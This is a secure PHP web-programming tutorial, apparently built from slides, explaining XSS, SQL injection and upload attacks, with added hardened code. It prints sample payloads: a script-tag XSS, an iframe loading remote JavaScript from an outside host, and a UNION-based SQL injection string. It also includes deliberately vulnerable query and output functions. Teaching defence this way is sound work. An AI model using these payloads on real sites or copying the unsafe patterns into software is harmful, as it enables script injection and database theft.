Secure Web App Programming in PHP
Akash Mahajan, v1.0
Cross Site Scripting - XSS
Injecting HTML/JS into the site.

Non-persistent / Reflected / First Order
The script is taken from the request and displayed in the browser directly:
example.com/search?q=<script>alert('hi');</script>
example.com/index.php?lang=path to php shell

Persistent / Stored / Second Order
The first name field of a registration form is vulnerable and the value is stored in the database:
Hello <iframe src=http://f1y.in/0.js></iframe>

DOM Based
No example; mentioned by Amit Klein in his paper "XSS of the Third Kind".
XSS mitigation in PHP
Sanitize all globals ($_GET, $_POST, $_COOKIE):
use strip_tags()
use the Inspekt library, code.google.com/p/inspekt
Escape everything before displaying: htmlentities(), htmlspecialchars()
Client headers like User-Agent can be malicious as well.
Thumb rule: if it's not your data, consider it bad. If you can verify it, consider it trusted good data.
White listing helps in verifying good data more than black listing.
See examples at xssed.com
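The two reflected cases from the XSS slide (the echoed search term and the lang parameter used to pick a file) and the whitelist rule from this slide, as an added example that is not from the deck; the function names, the LANG_FILES map and the name pattern are illustrative.

```php
<?php
// Added example (not from the slides). Names and the language map are made up.

// --- Reflected XSS: /search?q=... echoed back into the page -------------------
function render_search_unsafe(string $q): string {
    // Vulnerable: request data goes straight into HTML, so a script tag in q
    // is rendered and run by the visitor's browser.
    return "<p>Results for: " . $q . "</p>";
}

function render_search_safe(string $q): string {
    // Escape at the point of output, for the HTML context it lands in.
    // ENT_QUOTES also escapes ' and " so the value is safe inside attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>"
         . '<input type="text" name="q" value="' . $safe . '">';
}

// --- index.php?lang=... used to choose a file: whitelist, never a path --------
const LANG_FILES = [
    'en' => 'lang/en.php',   // illustrative paths
    'de' => 'lang/de.php',
];

function resolve_lang_file(?string $lang): string {
    // Look the value up in a fixed map; anything unknown falls back to the
    // default instead of being used as a path, so "path to php shell" is
    // never included.
    return LANG_FILES[$lang] ?? LANG_FILES['en'];
}

// --- Thumb rule: data you did not create is bad until verified ---------------
function is_valid_first_name(string $name): bool {
    // Whitelist what a name may contain (letters, space, apostrophe, hyphen)
    // rather than blacklisting tags; output is still escaped when displayed.
    return (bool) preg_match('/^[\p{L}\' -]{1,50}$/u', $name);
}

// Typical wiring of the three checks on a request:
// $q    = (string) ($_GET['q'] ?? '');
// echo render_search_safe($q);
// require resolve_lang_file($_GET['lang'] ?? null);
// if (!is_valid_first_name($_POST['first_name'] ?? '')) { /* reject */ }
```

Escaping is done when data is displayed, not when it is stored: the same first name may later land in HTML, in JSON or in an email, and each context needs its own encoding.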
SQL Injection
Allowing SQL to be injected into the database query. The most common attack points are the search of any dynamic website and registration forms; these two will definitely be talking to the database.
$sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";
id = ' OR 1 UNION ALL SELECT * FROM table;
Excellent examples: http://google.com/search?q=site:slideshare.net sql injection
SQL Injection - Mitigation
mysql_real_escape_string():
$dbquery = sprintf("SELECT name FROM user WHERE id='%s'", mysql_real_escape_string($id));
Parameterized queries:
$res = $query("SELECT name FROM user WHERE id=?", $id);
The standard mysql module in PHP doesn't allow for parameterized queries. You need mysqli.
Stored Procedures
See a kickass example of a stored proc used to hack more than a hundred thousand websites:
http://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
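The string-built query from the previous slide next to the two mitigations this slide lists, written as an added example with the mysqli extension (not code from the deck); $conn is assumed to be an open mysqli connection whose charset has been set with set_charset(), and the user table and its columns are illustrative.

```php
<?php
// Added example (not from the slides). Assumes $conn is a mysqli connection
// on which $conn->set_charset('utf8mb4') has already been called.

// Vulnerable: the request value becomes part of the SQL text, so the
// "' OR 1 UNION ALL SELECT ..." value from the slide rewrites the query.
function find_user_unsafe(mysqli $conn, string $id): array {
    $sql = "SELECT name FROM user WHERE id = '" . $id . "'";
    $res = $conn->query($sql);
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

// Hardened: the SQL text is fixed when prepare() runs and $id travels
// separately as a typed parameter, so the server never parses it as SQL.
function find_user_safe(mysqli $conn, int $id): array {
    $stmt = $conn->prepare("SELECT name FROM user WHERE id = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('i', $id);   // 'i' = integer; use 's' for string columns
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Fallback where a statement cannot be parameterised: escape with the
// connection's charset. Only works because the value sits inside quotes.
function find_user_escaped(mysqli $conn, string $id): array {
    $sql = sprintf("SELECT name FROM user WHERE id = '%s'",
                   $conn->real_escape_string($id));
    $res = $conn->query($sql);
    return $res ? $res->fetch_all(MYSQLI_ASSOC) : [];
}

// Validate before the database sees the value: a non-numeric id is rejected
// here, and the typed parameter would refuse it anyway.
function lookup_from_request(mysqli $conn): array {
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
    if ($id === false || $id === null) {
        return [];
    }
    return find_user_safe($conn, $id);
}
```

real_escape_string() is only safe once the connection charset is set; that is the addslashes() versus mysql_real_escape_string() point the Endgame slide links to.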
File Uploads
Web apps add a directory in the document root for storing file uploads and give it write access. They don't randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request and it gets executed.
http://www.scanit.be/uploads/php-file-upload.pdf
File Uploads - Mitigation
The usual use case is uploading of image files. Use getimagesize() to get the correct MIME type of the file from the file header.
Generate a random file name:
$rand = time() . substr(md5(microtime()), 0, rand(5, 12));
Return $rand and append the file extension.
Ideally noexec permission should be set on the directory where files are copied to.
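The upload handling described on the last two slides as one added example (not the deck's code): type from the file header, extension forced from the detected type, and a random name. It uses random_bytes() instead of the slide's time()/md5() name because that name is predictable; $upload is assumed to be one entry of $_FILES and $dir an upload directory outside the document root or mounted noexec.

```php
<?php
// Added example (not from the slides). $upload is one $_FILES entry,
// $dir is the destination directory (assumed noexec / not web-served as PHP).

// Only these header-detected types are accepted; the extension is ours,
// never the client's, so "shell.php" can never be written.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

function random_upload_name(string $ext): string {
    // 128 bits from the CSPRNG: the uploader cannot predict or choose the path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function store_image_upload(array $upload, string $dir): string {
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // Type comes from the file header, not from the client-supplied
    // $upload['type'] or the original filename's extension.
    $info = @getimagesize($upload['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        throw new RuntimeException('not an allowed image type');
    }
    $ext  = ALLOWED_IMAGE_TYPES[$info[2]];
    $dest = rtrim($dir, '/') . '/' . random_upload_name($ext);
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return basename($dest);
}

// Usage: $stored = store_image_upload($_FILES['avatar'], '/srv/uploads');
```

getimagesize() only confirms the header: a valid JPEG can still carry PHP in its metadata, so the forced extension, the noexec directory and, ideally, re-encoding the image with GD before storing are what prevent execution.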
Endgame
At this point you have reasonably ensured that your PHP web application is not compromised. But the users connecting to your website are still vulnerable to session hijacking, CSRF from your site, etc.
There are workarounds to the standard PHP functions, like this one for mysql_real_escape_string():
http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string